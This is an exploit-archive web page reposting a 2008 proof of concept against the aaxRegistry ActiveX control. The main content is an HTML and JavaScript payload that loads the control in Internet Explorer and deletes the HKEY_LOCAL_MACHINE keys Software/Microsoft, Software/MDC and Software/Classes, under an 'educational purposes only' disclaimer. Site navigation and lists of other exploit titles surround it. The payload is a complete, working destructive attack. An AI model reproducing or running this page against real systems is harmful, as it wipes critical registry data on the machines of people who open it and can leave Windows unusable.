首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit
来源:h4ck-y0u.org 作者:t0pP8uZz 发布时间:2008-05-09  
<HTML>

<!--

- aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit -

Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com
Description: ActiveX Remote Insecure

Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched

ActiveX: http://www.aaxcomponents.com/aaxRegistry/aaxRegistryTRIALSetup.EXE

The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.

InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions.

Peace.

-->

<OBJECT ID="aaareg" CLASSID="CLSID:5A000763-F048-46C9-8976-A62226ECB31E">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit - */
/*                       Javascript Code By t0pP8uZz                        */

aaareg.SetRootKey("HKEY_LOCAL_MACHINE"); /* Play with keys in HKLM ;) */

var x = [ /* Add new keys below.. Script will loop though and delete*/
'Software/Microsoft',
'Software/MDC',
'Software/Classes'
];

for(var c=0; c<x.length; c++)
aaareg.DeleteKey(x[c]);

</script>
</HTML>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Univeral HTTP Image/File Uploa
·EvansFTP (EvansFTP.ocx) Remote
·Registry Pro (epRegPro.ocx) Re
·Secure File Delete Wizard <= 2
·vShare Youtube Clone 2.6 (tid)
·TFTP Server for Windows 1.4 ST
·txtCMS 0.3 (index.php) Local F
·RunCMS <= 1.6.1 (msg_image) SQ
·Joomla Component com_datsogall
·rdesktop 1.5.0 iso_recv_msg()
·rdesktop 1.5.0 process_redirec
·OneCMS 2.5 Remote Blind SQL In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved